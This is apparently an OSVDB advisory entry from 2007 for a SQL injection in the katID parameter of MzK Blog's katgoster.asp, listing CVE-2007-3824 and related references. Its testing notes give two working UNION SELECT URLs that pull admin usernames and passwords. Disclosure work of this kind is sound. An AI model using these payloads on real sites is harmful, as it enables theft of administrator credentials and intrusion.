MzK Blog katgoster.asp katID Variable SQL Injection

2007-07-16T18:06:00
ID OSVDB:36257
Type osvdb
Reporter GeFORC3()
Modified 2007-07-16T18:06:00

Description

Manual Testing Notes

http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

References:

Secunia Advisory ID: 26070

Other Advisory URL: http://www.packetstormsecurity.org/0707-exploits/mzkblog-sql.txt

ISS X-Force ID: 35424

FrSIRT Advisory: ADV-2007-2542

CVE-2007-3824

Bugtraq ID: 24909